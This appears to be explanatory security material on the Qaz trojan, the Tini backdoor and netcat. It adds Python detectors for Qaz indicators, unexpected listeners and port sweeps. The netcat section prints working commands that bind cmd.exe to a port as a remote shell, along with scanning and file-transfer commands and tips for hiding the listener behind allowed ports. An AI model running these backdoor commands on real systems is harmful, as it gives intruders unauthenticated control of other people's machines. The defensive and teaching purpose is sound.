W32.HLLW.Qaz.A was first discovered in China in July 2000.
This Trojan gained wide media coverage for its part in the intrusion at
Microsoft. How it got there was a much debated topic, as it was found on
several computers on Microsoft's LAN. Much speculation surrounded the
possibility of a hacker probing a system during a download and injecting the
Trojan.
It is a companion virus that can spread over the network. It also
has a "backdoor" that will enable a remote user to connect to and control the
computer using port 7597. Because the virus cannot spread to computers outside
of the network, it may have originally been sent out by email.
W32.HLLW.Qaz.A was originally known as Qaz Trojan. It was renamed
to W32.HLLW.Qaz.A on August 10, 2000. There exist variants to this companion
virus. When W32.HLLW.Qaz.A is launched, it searches for and renames Notepad.exe
to Note.com. W32.HLLW.Qaz.A then copies itself to the computer as Notepad.exe.
Each time Notepad.exe is executed, it runs the virus code and the original
Notepad, which is renamed to Note.com, to avoid being noticed. The virus adds
the following string value:
startIE "notepad qazwsx.hsq"
to the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
W32.HLLW.Qaz.A enumerates the network neighborhood and attempts to find a
computer to infect. When it finds one, it infects it by searching for
Notepad.exe and making the same modifications as described above. It does not
require any mapped drives to infect other computers. Once the computer is
infected, its IP address is emailed to a remote user. The backdoor payload in
the virus uses WinSock and awaits a connection. This enables a hacker to connect
to and gain access to the infected computer.
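The description above gives three host-side indicators of W32.HLLW.Qaz.A: the Run key value, the renamed Notepad (Note.com beside a replaced Notepad.exe) and a TCP listener on port 7597. The following script is an added example, not part of the original text and not associated with any vendor tool; it checks all three against inputs that stand in for a registry export, a directory listing and `netstat -an` output. The sample inputs are constructed for the example, and the `SecurityHealth` value and the addresses in them are hypothetical.

```python
import re

# Indicators taken from the description of W32.HLLW.Qaz.A above.
QAZ_RUN_VALUE = "startIE"
QAZ_RUN_DATA = "notepad qazwsx.hsq"
QAZ_PORT = 7597

# Constructed sample of a .reg-style export of the Run key (hypothetical host).
SAMPLE_RUN_KEY = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"startIE"="notepad qazwsx.hsq"
'''

# Constructed sample of the file names found in the Windows directory.
SAMPLE_WINDIR_LISTING = ["explorer.exe", "notepad.exe", "Note.com", "regedit.exe"]

# Constructed sample of `netstat -an` output.
SAMPLE_NETSTAT = """
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7597           0.0.0.0:0              LISTENING
  TCP    192.168.1.10:49710     192.168.1.20:445       ESTABLISHED
"""


def check_run_key(reg_dump):
    """Flag the Qaz Run value either by its name or by its tell-tale data."""
    findings = []
    for m in re.finditer(r'^"([^"]+)"="([^"]*)"', reg_dump, re.MULTILINE):
        name, data = m.group(1), m.group(2)
        if name == QAZ_RUN_VALUE or QAZ_RUN_DATA.split()[-1] in data.lower():
            findings.append(f"Run value {name!r} = {data!r}")
    return findings


def check_companion(listing):
    """Note.com next to notepad.exe is the renamed original Notepad."""
    names = {n.lower() for n in listing}
    if "note.com" in names and "notepad.exe" in names:
        return ["Note.com present beside notepad.exe (companion infection)"]
    return []


def check_listener(netstat_output, port=QAZ_PORT):
    """Flag a TCP socket in LISTENING state on the backdoor port."""
    findings = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0] == "TCP" and parts[3] == "LISTENING":
            if parts[1].rsplit(":", 1)[-1] == str(port):
                findings.append(f"TCP listener on port {port}: {parts[1]}")
    return findings


def scan_host(reg_dump, listing, netstat_output):
    """Combine the three checks; an empty list means no Qaz indicator was seen."""
    return (check_run_key(reg_dump)
            + check_companion(listing)
            + check_listener(netstat_output))


if __name__ == "__main__":
    for finding in scan_host(SAMPLE_RUN_KEY, SAMPLE_WINDIR_LISTING, SAMPLE_NETSTAT):
        print("INDICATOR:", finding)
```

Each check is independent on purpose: a variant that changes the port or the Run value name still trips the companion-file check, and the registry check matches on the `qazwsx.hsq` data as well as on the value name.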
Tini is a simple and very small (3kb) backdoor for Windows,
coded in assembler by Arne Vidstrom. It listens at TCP port 7777 and gives
anybody who connects a remote Command Prompt.
The reason this application is discussed here is that it makes it possible to
remotely control a machine without any validation or authentication mechanism.
Though the author does not consider it a Trojan, its use in creating a backdoor
was seen during the Gator exploit, in which the Gator installer plug-in allowed
any software to be installed.
The vulnerability existed in a plug-in which installed the actual
software. This plug-in was scriptable and an HTML page could be used to specify
the location of the Gator installation. The installation file downloaded is
checked for the filename. If the filename was setup.exe, it was then
decompressed and executed. If the file was not compressed it would still be
executed. Using this method, a malicious user could easily create an HTML page
which makes use of the rogue ActiveX component to point at a Trojan file.
This Trojan demonstrates how a backdoor can be used to remotely access the
system at a later time. A backdoor's goal is to remove the evidence of the
initial entry from the system's logs. An effective backdoor will allow the
attacker to retain access to a machine he has penetrated even if the original
intrusion has in the meantime been detected by the system administrator.
Resetting passwords, changing disk access permissions or fixing the original
security holes in the hope of remedying the problem may therefore not be a
sufficient response.
The original version of Netcat was written by Hobbit and the NT version was
done by Weld Pond.
Using netcat, the attacker can set up a port or a back door that will allow him
to telnet into a DOS shell. With a simple command such as
C:\>nc -L -p 5000 -t -e cmd.exe
the attacker can bind port 5000. This is detailed later. Let us first take a
look at some of the features that netcat provides.
With netcat, the user can create outbound or inbound connections,
TCP or UDP, to or from any port. It provides for full DNS forward/reverse
checking, with appropriate warnings. Additionally, it gives the ability to use
any local source port, any locally-configured network source address and comes
with built-in port-scanning capabilities. It has a built-in loose source-routing
capability and can read command line arguments from standard input. Another
feature is the ability to let another program service inbound connections.
Given these features, some of the applications of netcat can be
enumerated as an enabling script backend, port scanner and enumerator, used as
backup handlers and for file transfers, firewall testing, proxy gatewaying,
simulating servers, testing network performance and testing address spoofing. It
is not without reason that this is called a network Swiss army knife.
Let us take a closer look at the command. On a Windows server when
the following command is issued (i.e. from the directory that contains
netcat)
nc -l -p4444 -d -e cmd.exe -L
The -l (lowercase L) puts netcat into listening mode, -p4444 tells netcat to
use port 4444, -d lets netcat run detached from the console, -e cmd.exe tells
netcat to execute cmd.exe when a connection is established, and -L restarts
netcat with the same command line when the connection is terminated.
On the client system the following command
C:\>nc -v [ip address of target] 4444
causes netcat to connect to the server whose IP is specified on
port 4444. The user is then given a console connection to the destination
server. Netcat can also make an outbound connection and then run a program or
script on the originating end, with input and output connected to the same
network port.
On the target system, the attacker can choose to rename the
executable or recompile it with a different name. To remain hidden he can choose
to detach from the console option (-d) or use a port that is well known and
allowed through any firewalls between the two systems. This will not arouse
suspicions till later on.
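The last paragraph is the defender's problem in a nutshell: a renamed binary on a port the firewall already allows defeats any rule keyed on the port number or the file name. What does not change is that some process on the host must hold a listening socket, and `netstat -ano` names the owning PID while `tasklist` names the image. The script below is an added example, not from the original text or from the netcat project; it joins the two outputs and reports every TCP listener whose image is not on a baseline of images expected to listen, so the "well-known port" trick is caught regardless of port. The two outputs, the baseline set and the image name `svcupdate.exe` are constructed for the example.

```python
import re

# Hypothetical baseline: images that are expected to own listening sockets on
# this host. Build the real one from a known-good snapshot of the machine.
EXPECTED_LISTENERS = {"system", "svchost.exe", "lsass.exe", "services.exe", "wininit.exe"}

# Constructed sample of `netstat -ano` output. The listener on port 80 owned by
# PID 3120 stands in for a renamed binary bound to an allowed, well-known port.
SAMPLE_NETSTAT_ANO = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       3120
  TCP    192.168.1.10:80        192.168.1.50:51522     ESTABLISHED     3120
  UDP    0.0.0.0:123            *:*                                    1180
"""

# Constructed sample of `tasklist` output for the same host.
SAMPLE_TASKLIST = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Services                   0         24 K
svchost.exe                    904 Services                   0      9,512 K
svchost.exe                   1180 Services                   0      5,204 K
svcupdate.exe                 3120 Console                    1        312 K
"""


def parse_tasklist(text):
    """Map PID -> lower-cased image name from `tasklist` output."""
    pid_to_image = {}
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s+(\d+)\s", line)  # header and ruler lines do not match
        if m:
            pid_to_image[int(m.group(2))] = m.group(1).lower()
    return pid_to_image


def parse_listeners(text):
    """Yield (local address, pid) for every TCP socket in LISTENING state."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            yield parts[1], int(parts[4])


def unexpected_listeners(netstat_text, tasklist_text, expected=EXPECTED_LISTENERS):
    """Return (image, pid, port) for each listener whose image is off-baseline.
    The port is reported but never used for the decision."""
    images = parse_tasklist(tasklist_text)
    findings = []
    for local, pid in parse_listeners(netstat_text):
        image = images.get(pid, "<no such pid>")
        if image not in expected:
            port = int(local.rsplit(":", 1)[-1])
            findings.append((image, pid, port))
    return findings


if __name__ == "__main__":
    for image, pid, port in unexpected_listeners(SAMPLE_NETSTAT_ANO, SAMPLE_TASKLIST):
        print(f"unexpected listener: {image} (pid {pid}) on TCP port {port}")
```

A PID that appears in `netstat` but not in `tasklist` is reported as `<no such pid>` rather than silently skipped, since a listener with no visible owner is itself worth a look. The same join works for the Tini backdoor on port 7777 and the Qaz backdoor on port 7597 described earlier, without having to know either port in advance.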
A scanning example from Hobbit is "nc -v -w 2 -z target 20-30".
Netcat will try connecting to every port between 20 and 30 [inclusive] at the
target, and inform about an FTP server, telnet server, and mailer it has come
across in the range. The -z switch prevents sending any data to a TCP connection
and very limited probe data to a UDP connection. This makes it useful as a fast
scanner to see what ports the target is listening on. To limit scanning speed if
desired, -i will insert a delay between each port probe.
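Seen from the target's side, the scan above is one source touching eleven distinct ports on one host within a couple of seconds, which is a pattern a connection log will show whatever tool produced it. The following detector is an added example, not from the original text; it groups log events by (source, destination) pair and slides a time window over them looking for a burst of distinct destination ports. The log format and the addresses are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of a connection log (hypothetical format):
# "<ISO timestamp> <source ip> <destination ip> <destination port>"
# 10.0.0.5 probes ports 20-30 of 10.0.0.9 within two seconds; 10.0.0.7 is
# ordinary traffic to the same host.
SAMPLE_LOG = """
2024-01-01T09:59:30 10.0.0.7 10.0.0.9 22
2024-01-01T10:00:00 10.0.0.5 10.0.0.9 20
2024-01-01T10:00:00 10.0.0.5 10.0.0.9 21
2024-01-01T10:00:00 10.0.0.5 10.0.0.9 22
2024-01-01T10:00:00 10.0.0.5 10.0.0.9 23
2024-01-01T10:00:01 10.0.0.5 10.0.0.9 24
2024-01-01T10:00:01 10.0.0.5 10.0.0.9 25
2024-01-01T10:00:01 10.0.0.5 10.0.0.9 26
2024-01-01T10:00:01 10.0.0.5 10.0.0.9 27
2024-01-01T10:00:02 10.0.0.5 10.0.0.9 28
2024-01-01T10:00:02 10.0.0.5 10.0.0.9 29
2024-01-01T10:00:02 10.0.0.5 10.0.0.9 30
2024-01-01T10:03:15 10.0.0.7 10.0.0.9 80
2024-01-01T10:03:16 10.0.0.7 10.0.0.9 443
"""


def parse_log(text):
    """Parse log lines into (timestamp, src, dst, dport); malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        events.append((datetime.fromisoformat(parts[0]), parts[1], parts[2], int(parts[3])))
    return events


def detect_port_sweeps(events, window_seconds=5, min_ports=8):
    """For each (src, dst) pair, find the largest set of distinct destination
    ports touched inside any window of `window_seconds`; report the pair when
    that set reaches `min_ports`."""
    window = timedelta(seconds=window_seconds)
    by_pair = defaultdict(list)
    for ts, src, dst, port in events:
        by_pair[(src, dst)].append((ts, port))

    alerts = []
    for (src, dst), hits in by_pair.items():
        hits.sort()  # time order, so the sliding window below is valid
        best = set()
        start = 0
        for end in range(len(hits)):
            # drop the oldest hits until the span [start, end] fits the window
            while hits[end][0] - hits[start][0] > window:
                start += 1
            ports = {port for _, port in hits[start:end + 1]}
            if len(ports) > len(best):
                best = ports
        if len(best) >= min_ports:
            alerts.append({"src": src, "dst": dst, "ports": sorted(best)})
    return alerts


if __name__ == "__main__":
    for alert in detect_port_sweeps(parse_log(SAMPLE_LOG)):
        print(f"port sweep: {alert['src']} -> {alert['dst']} ports {alert['ports']}")
```

The window and port threshold are the tuning knobs: the -i delay mentioned above spreads the probes out in time, so a scan slowed to one probe every few seconds falls below the default five-second window and needs a longer window (and a correspondingly higher port threshold to keep normal traffic quiet).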
To receive a file named targetfile on the target system, start netcat with the
following command:
nc -l -p 4444 >targetfile
To send a file named myfile to the target system from the source system, use
the following command:
nc target 4444 <myfile
Issue a Ctrl+C on the source system and the session is over.